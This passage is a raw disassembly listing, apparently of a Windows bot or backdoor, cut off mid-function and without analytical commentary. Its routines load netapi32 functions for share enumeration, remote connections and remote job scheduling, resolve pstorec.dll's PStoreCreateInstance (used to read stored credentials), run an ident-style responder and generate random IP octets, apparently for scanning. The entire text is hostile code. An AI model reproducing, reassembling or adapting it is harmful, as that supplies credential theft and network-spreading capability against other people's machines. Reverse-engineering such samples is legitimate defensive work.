; ---------------------------------------------------------------------------
loc_40374C: ; CODE XREF: sub_403588+1B2�j
mov eax, [ebp+var_20]
imul eax, 30h
push eax
push 0
push [ebp+var_1C]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp+var_10]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_10], 2
cmp [ebp+arg_4], 0
jz short loc_403790
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; htons
mov [ebp+var_E], ax
loc_403790: ; CODE XREF: sub_403588+1F2�j
and [ebp+var_18], 0
jmp short loc_40379D
; ---------------------------------------------------------------------------
loc_403796: ; CODE XREF: sub_403588:loc_4038A7�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_40379D: ; CODE XREF: sub_403588+20C�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_20]
jnb loc_4038AC
cmp [ebp+arg_8], 0
jz short loc_4037B9
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_40], eax
jmp short loc_4037C0
; ---------------------------------------------------------------------------
loc_4037B9: ; CODE XREF: sub_403588+225�j
mov [ebp+var_40], 4
loc_4037C0: ; CODE XREF: sub_403588+22F�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_40]
mov [ecx+eax], edx
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+eax+4], 2
cmp [ebp+arg_8], 0
jz short loc_4037F1
mov eax, [ebp+arg_8]
mov eax, [eax+8]
mov [ebp+var_44], eax
jmp short loc_4037F8
; ---------------------------------------------------------------------------
loc_4037F1: ; CODE XREF: sub_403588+25C�j
mov [ebp+var_44], 1
loc_4037F8: ; CODE XREF: sub_403588+267�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_44]
mov [ecx+eax+8], edx
cmp [ebp+arg_8], 0
jz short loc_403819
mov eax, [ebp+arg_8]
mov eax, [eax+0Ch]
mov [ebp+var_48], eax
jmp short loc_403820
; ---------------------------------------------------------------------------
loc_403819: ; CODE XREF: sub_403588+284�j
mov [ebp+var_48], 6
loc_403820: ; CODE XREF: sub_403588+28F�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_48]
mov [ecx+eax+0Ch], edx
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+eax+10h], 10h
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
lea eax, [ecx+eax+20h]
mov ecx, [ebp+var_18]
imul ecx, 30h
mov edx, [ebp+var_1C]
mov [edx+ecx+18h], eax
mov eax, [ebp+var_14]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_18]
mov eax, [eax+ecx*4]
mov eax, [eax]
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
lea eax, [ecx+eax+20h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
cmp [ebp+var_18], 0
jz short loc_4038A7
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
add ecx, eax
mov eax, [ebp+var_18]
dec eax
imul eax, 30h
mov edx, [ebp+var_1C]
mov [edx+eax+1Ch], ecx
loc_4038A7: ; CODE XREF: sub_403588+304�j
jmp loc_403796
; ---------------------------------------------------------------------------
loc_4038AC: ; CODE XREF: sub_403588+21B�j
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_1C]
mov [eax], ecx
xor eax, eax
locret_4038B6: ; CODE XREF: sub_403588+2E�j
; sub_403588+55�j ...
leave
retn 10h
sub_403588 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038BA proc near ; DATA XREF: sub_403BD3+1BC�o
var_434 = dword ptr -434h
var_430 = byte ptr -430h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 434h
cmp [ebp+arg_8], 0
jnz short loc_4038CF
cmp [ebp+arg_10], 0
jz short loc_4038D8
loc_4038CF: ; CODE XREF: sub_4038BA+D�j
mov eax, [ebp+arg_18]
and al, 0E0h
test eax, eax
jz short loc_4038ED
loc_4038D8: ; CODE XREF: sub_4038BA+13�j
push 2726h
call ds:dword_417234 ; WSASetLastError
mov eax, 2726h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4038ED: ; CODE XREF: sub_4038BA+1C�j
mov eax, [ebp+arg_0]
mov [ebp+var_40C], eax
mov eax, [ebp+var_40C]
movsx eax, word ptr [eax]
cmp eax, 2
jz short loc_403919
push 273Fh
call ds:dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403919: ; CODE XREF: sub_4038BA+48�j
cmp [ebp+arg_8], 0
jz loc_403ABA
mov eax, [ebp+var_40C]
push dword ptr [eax+4]
call ds:dword_41721C ; inet_ntoa
mov [ebp+var_434], eax
cmp [ebp+var_434], 0
jnz short loc_403949
or eax, 0FFFFFFFFh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403949: ; CODE XREF: sub_4038BA+85�j
push 401h
push [ebp+var_434]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+arg_18]
and eax, 2
test eax, eax
jz short loc_403972
jmp loc_403BB4
; ---------------------------------------------------------------------------
loc_403972: ; CODE XREF: sub_4038BA+B1�j
mov eax, [ebp+arg_18]
and eax, 4
test eax, eax
jz short loc_4039F4
push 0
push 4
mov eax, [ebp+var_40C]
add eax, 4
push eax
call ds:dword_417220 ; gethostbyaddr
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_4039AA
call ds:dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039AA: ; CODE XREF: sub_4038BA+E3�j
mov eax, [ebp+var_410]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_4039D3
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039D3: ; CODE XREF: sub_4038BA+102�j
push 401h
mov eax, [ebp+var_410]
push dword ptr [eax]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
jmp loc_403ABA
; ---------------------------------------------------------------------------
loc_4039F4: ; CODE XREF: sub_4038BA+C0�j
mov eax, [ebp+arg_18]
and eax, 1
test eax, eax
jz loc_403A92
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 7F000001h
jz short loc_403A1D
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 0
jnz short loc_403A92
loc_403A1D: ; CODE XREF: sub_4038BA+155�j
push 0
push 4
mov eax, [ebp+var_40C]
add eax, 4
push eax
call ds:dword_417220 ; gethostbyaddr
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_403A4B
call ds:dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A4B: ; CODE XREF: sub_4038BA+184�j
mov eax, [ebp+var_410]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_403A74
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A74: ; CODE XREF: sub_4038BA+1A3�j
push 401h
mov eax, [ebp+var_410]
push dword ptr [eax]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_403ABA
; ---------------------------------------------------------------------------
loc_403A92: ; CODE XREF: sub_4038BA+142�j
; sub_4038BA+161�j ...
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_403ABA
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403ABA: ; CODE XREF: sub_4038BA+63�j
; sub_4038BA+135�j ...
cmp [ebp+arg_10], 0
jz loc_403B99
push 8
pop eax
test eax, eax
jz short loc_403B2C
push 0Ah
lea eax, [ebp+var_430]
push eax
mov eax, [ebp+var_40C]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_430]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_403B19
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403B19: ; CODE XREF: sub_4038BA+248�j
lea eax, [ebp+var_430]
push eax
push [ebp+arg_10]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_403B99
; ---------------------------------------------------------------------------
loc_403B2C: ; CODE XREF: sub_4038BA+20F�j
mov eax, [ebp+arg_18]
and eax, 10h
neg eax
sbb eax, eax
and eax, offset aUdp ; "udp"
push eax
mov eax, [ebp+var_40C]
movzx eax, word ptr [eax+2]
push eax
call ds:dword_417228 ; getservbyport
mov [ebp+var_408], eax
cmp [ebp+var_408], 0
jnz short loc_403B61
or eax, 0FFFFFFFFh
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B61: ; CODE XREF: sub_4038BA+2A0�j
mov eax, [ebp+var_408]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_403B87
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B87: ; CODE XREF: sub_4038BA+2B9�j
mov eax, [ebp+var_408]
push dword ptr [eax]
push [ebp+arg_10]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_403B99: ; CODE XREF: sub_4038BA+204�j
; sub_4038BA+270�j
cmp [ebp+arg_8], 0
jz short loc_403BB0
lea eax, [ebp+var_404]
push eax
push [ebp+arg_8]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_403BB0: ; CODE XREF: sub_4038BA+2E3�j
xor eax, eax
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403BB4: ; CODE XREF: sub_4038BA+B3�j
jmp loc_403A92
; ---------------------------------------------------------------------------
locret_403BB9: ; CODE XREF: sub_4038BA+2E�j
; sub_4038BA+5A�j ...
leave
retn 1Ch
sub_4038BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BBD proc near ; DATA XREF: sub_403BD3+1C6�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jz short loc_403BCF
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
loc_403BCF: ; CODE XREF: sub_403BBD+7�j
pop ebp
retn 4
sub_403BBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BD3 proc near ; CODE XREF: sub_4167F1:loc_4168BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_403C00
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push [ebp+var_C]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE40, eax
loc_403C00: ; CODE XREF: sub_403BD3+18�j
push offset aNetapi32_dll ; "netapi32.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz loc_403CC3
push offset aNetusegetinfo ; "NetUseGetInfo"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE48, eax
push offset aNetuseadd ; "NetUseAdd"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE4C, eax
push offset aNetusedel ; "NetUseDel"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE50, eax
push offset aNetuserenum ; "NetUserEnum"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE54, eax
push offset aNetshareenum ; "NetShareEnum"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE58, eax
push offset aNetremotetod ; "NetRemoteTOD"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE5C, eax
push offset aNetapibufferfr ; "NetApiBufferFree"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE60, eax
push offset aNetschedulejob ; "NetScheduleJobAdd"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE64, eax
push offset aNetaddalternat ; "NetAddAlternateComputerName"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE68, eax
loc_403CC3: ; CODE XREF: sub_403BD3+3F�j
push offset aMpr_dll ; "mpr.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_403D23
push offset aWnetaddconnect ; "WNetAddConnection2A"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE6C, eax
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE70, eax
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE74, eax
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE78, eax
loc_403D23: ; CODE XREF: sub_403BD3+102�j
push offset aWs2_32_dll ; "ws2_32.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
push offset aGetaddrinfo ; "getaddrinfo"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE84, eax
push offset aGetnameinfo ; "getnameinfo"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE88, eax
push offset aFreeaddrinfo ; "freeaddrinfo"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE8C, eax
cmp dword_41DE84, 0
jz short loc_403D85
cmp dword_41DE88, 0
jz short loc_403D85
cmp dword_41DE8C, 0
jnz short loc_403DA3
loc_403D85: ; CODE XREF: sub_403BD3+19E�j
; sub_403BD3+1A7�j
mov dword_41DE84, offset sub_403588
mov dword_41DE88, offset sub_4038BA
mov dword_41DE8C, offset sub_403BBD
loc_403DA3: ; CODE XREF: sub_403BD3+1B0�j
push offset aPstorec_dll ; "pstorec.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_403DCA
push offset aPstorecreatein ; "PStoreCreateInstance"
push [ebp+var_10]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE80, eax
loc_403DCA: ; CODE XREF: sub_403BD3+1E2�j
push offset aWininet_dll ; "wininet.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short locret_403DF1
push offset aInternetgetcon ; "InternetGetConnectedStateExA"
push [ebp+var_18]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE7C, eax
locret_403DF1: ; CODE XREF: sub_403BD3+209�j
leave
retn
sub_403BD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DF3 proc near ; DATA XREF: sub_403FE5+89�o
var_1228 = dword ptr -1228h
var_1224 = byte ptr -1224h
var_1200 = byte ptr -1200h
var_11DC = byte ptr -11DCh
var_11B8 = dword ptr -11B8h
var_11B4 = dword ptr -11B4h
var_11B0 = dword ptr -11B0h
var_11AC = byte ptr -11ACh
var_11A6 = byte ptr -11A6h
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1228h
call sub_416BC0
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_11B0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_11AC]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_11B4], eax
cmp [ebp+var_11B4], 0
jnz short loc_403E52
push [ebp+var_11B0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_403FE1
; ---------------------------------------------------------------------------
loc_403E52: ; CODE XREF: sub_403DF3+4A�j
lea eax, [ebp+var_11AC]
push eax
mov eax, [ebp+var_11B0]
push dword ptr [eax]
push offset dword_4189C4
lea eax, [ebp+var_11A6]
push eax
call sub_40D53F
add esp, 10h
loc_403E75: ; CODE XREF: sub_403DF3+BD�j
; sub_403DF3+10F�j ...
push 3E8h
push [ebp+var_11B4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_11B8], eax
mov eax, [ebp+var_11B0]
cmp dword ptr [eax+4], 0
jnz short loc_403EA2
cmp [ebp+var_11B8], 0
jnz short loc_403EA7
loc_403EA2: ; CODE XREF: sub_403DF3+A4�j
jmp loc_403FC7
; ---------------------------------------------------------------------------
loc_403EA7: ; CODE XREF: sub_403DF3+AD�j
cmp [ebp+var_11B8], 0FFFFFFFFh
jnz short loc_403EB2
jmp short loc_403E75
; ---------------------------------------------------------------------------
loc_403EB2: ; CODE XREF: sub_403DF3+BB�j
push 1000h
lea eax, [ebp+var_1000]
push eax
push [ebp+var_11B8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_1228], eax
cmp [ebp+var_1228], 0
jz short loc_403EF6
cmp [ebp+var_1228], 0FFFFFFFFh
jz short loc_403EF6
lea eax, [ebp+var_1000]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 10h
jbe short loc_403F07
loc_403EF6: ; CODE XREF: sub_403DF3+E6�j
; sub_403DF3+EF�j
push [ebp+var_11B8]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403F07: ; CODE XREF: sub_403DF3+101�j
movsx eax, byte_41EEC8
test eax, eax
jz short loc_403F27
push offset byte_41EEC8
lea eax, [ebp+var_1224]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_403F57
; ---------------------------------------------------------------------------
loc_403F27: ; CODE XREF: sub_403DF3+11D�j
lea eax, [ebp+var_1200]
push eax
lea eax, [ebp+var_1224]
push eax
lea eax, [ebp+var_11DC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1224]
push eax
push offset byte_41EEC8
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_403F57: ; CODE XREF: sub_403DF3+132�j
push offset aUseridUnix ; " : USERID : UNIX : "
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1224]
push eax
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1000]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_1000]
push eax
push [ebp+var_11B8]
call sub_4053BF
add esp, 0Ch
push [ebp+var_11B8]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: sub_403DF3:loc_403EA2�j
push [ebp+var_11B4]
call sub_404CBB
pop ecx
push [ebp+var_11B0]
call sub_409763
pop ecx
xor eax, eax
locret_403FE1: ; CODE XREF: sub_403DF3+5A�j
leave
retn 4
sub_403DF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FE5 proc near ; CODE XREF: sub_40A9CF+EEC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_403FFD
push [ebp+arg_4]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_404004
loc_403FFD: ; CODE XREF: sub_403FE5+9�j
mov [ebp+arg_4], offset dword_418A18
loc_404004: ; CODE XREF: sub_403FE5+16�j
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40401A
jmp short locret_40407B
; ---------------------------------------------------------------------------
loc_40401A: ; CODE XREF: sub_403FE5+31�j
push 6
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
cmp [ebp+arg_0], 0
jz short loc_404059
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
test eax, eax
jz short loc_404059
and [ebp+var_8], 0
jmp short loc_404060
; ---------------------------------------------------------------------------
loc_404059: ; CODE XREF: sub_403FE5+5E�j
; sub_403FE5+6C�j
mov [ebp+var_8], 1
loc_404060: ; CODE XREF: sub_403FE5+72�j
push [ebp+arg_4]
push offset dword_4189F8
push [ebp+var_8]
push [ebp+var_4]
push offset sub_403DF3
call sub_4095A4
add esp, 14h
locret_40407B: ; CODE XREF: sub_403FE5+33�j
leave
retn
sub_403FE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40407D proc near ; CODE XREF: sub_4055E5+772�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
loc_404085: ; CODE XREF: sub_40407D+2C�j
cmp [ebp+arg_4], 1
jbe short loc_4040AB
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
dec eax
mov [ebp+arg_4], eax
jmp short loc_404085
; ---------------------------------------------------------------------------
loc_4040AB: ; CODE XREF: sub_40407D+C�j
cmp [ebp+arg_4], 0
jz short loc_4040BF
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
loc_4040BF: ; CODE XREF: sub_40407D+32�j
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
add eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
not eax
leave
retn
sub_40407D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040E8 proc near ; CODE XREF: sub_4055E5+752�p
; sub_40A9CF+1A2F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
cmp [ebp+var_4], 2
jz short loc_404146
cmp [ebp+var_4], 3
jz short loc_404124
cmp [ebp+var_4], 4
jz short loc_404106
jmp short loc_40416A
; ---------------------------------------------------------------------------
loc_404106: ; CODE XREF: sub_4040E8+1A�j
mov eax, [ebp+arg_0]
and al, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404124: ; CODE XREF: sub_4040E8+14�j
mov eax, [ebp+arg_0]
and ah, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 8
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404146: ; CODE XREF: sub_4040E8+E�j
mov eax, [ebp+arg_0]
and eax, 0FF00FFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 10h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_40416A: ; CODE XREF: sub_4040E8+1C�j
mov eax, [ebp+arg_0]
and eax, 0FFFFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 18h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
mov eax, [ebp+arg_0]
leave
retn
sub_4040E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404193 proc near ; CODE XREF: sub_404279+A�p
; sub_40435B+17�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0Ah
push [ebp+arg_0]
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
pop ebp
retn
sub_404193 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041B7 proc near ; CODE XREF: sub_40D871+5B3�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push offset dword_418A48
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041D5
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041D5: ; CODE XREF: sub_4041B7+17�j
push 4
push offset dword_418A40
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041F0
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041F0: ; CODE XREF: sub_4041B7+32�j
push 8
push offset dword_418A34
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_40420B
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_40420B: ; CODE XREF: sub_4041B7+4D�j
push 3
push offset dword_418A30
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_404226
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_404226: ; CODE XREF: sub_4041B7+68�j
xor eax, eax
loc_404228: ; CODE XREF: sub_4041B7+1C�j
; sub_4041B7+37�j ...
pop ebp
retn
sub_4041B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40422A proc near ; CODE XREF: sub_402A32+206�p
; sub_403FE5+E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_40423C
; ---------------------------------------------------------------------------
loc_404235: ; CODE XREF: sub_40422A:loc_404273�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40423C: ; CODE XREF: sub_40422A+9�j
cmp [ebp+var_4], 6
jnz short loc_404244
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_404244: ; CODE XREF: sub_40422A+16�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_404273
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40426C
cmp [ebp+var_8], 0FFFFh
jbe short loc_40426E
loc_40426C: ; CODE XREF: sub_40422A+37�j
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_40426E: ; CODE XREF: sub_40422A+40�j
push 1
pop eax
jmp short locret_404277
; ---------------------------------------------------------------------------
loc_404273: ; CODE XREF: sub_40422A+25�j
jmp short loc_404235
; ---------------------------------------------------------------------------
loc_404275: ; CODE XREF: sub_40422A+18�j
; sub_40422A:loc_40426C�j
xor eax, eax
locret_404277: ; CODE XREF: sub_40422A+47�j
leave
retn
sub_40422A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404279 proc near ; CODE XREF: sub_4042FB+C�p
; sub_408B30+197�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_8]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4042A4
push 1
pop eax
jmp short locret_4042F9
; ---------------------------------------------------------------------------
loc_4042A4: ; CODE XREF: sub_404279+24�j
push 0BB8h
push 0
lea eax, [ebp+var_8]
push eax
push offset dword_41EF48
call sub_4050EA
add esp, 10h
mov [ebp+var_C], eax
push [ebp+var_10]
call sub_404CBB
pop ecx
cmp [ebp+var_C], 0
jz short loc_4042DA
cmp [ebp+var_C], 0FFFFFFFFh
jz short loc_4042DA
and [ebp+var_18], 0
jmp short loc_4042E1
; ---------------------------------------------------------------------------
loc_4042DA: ; CODE XREF: sub_404279+53�j
; sub_404279+59�j
mov [ebp+var_18], 1
loc_4042E1: ; CODE XREF: sub_404279+5F�j
